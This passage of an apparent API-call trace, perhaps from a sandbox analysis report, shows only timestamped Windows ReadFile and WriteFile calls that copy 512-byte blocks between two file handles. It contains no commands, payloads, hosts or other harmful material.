[0020.462] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.462] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.463] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.463] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.464] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.464] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.465] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.465] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.465] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.466] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.466] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.467] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.467] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.468] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.468] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.469] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.469] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x1fb, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.470] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.470] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.471] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.471] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.472] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.472] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.472] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.473] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.473] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.474] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.474] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.475] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.475] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.476] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.477] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.477] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.478] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.478] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.479] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.479] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.480] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.480] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.481] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.481] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.482] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.482] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.483] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.483] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.483] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.484] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.484] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.485] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.485] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.486] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.486] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.487] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.487] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.488] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.488] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.489] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.489] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.490] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.490] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.491] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.491] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.492] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.492] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.493] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.493] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.494] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.494] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.494] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.495] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.495] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.496] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.496] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.497] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.497] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.498] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.498] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.499] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.499] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.500] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.500] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x1fb, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.501] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.501] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.501] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.502] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.502] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.503] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.503] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.504] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.504] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.505] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.505] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.506] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.506] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.507] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.507] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.508] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.508] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.509] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.509] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.510] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, 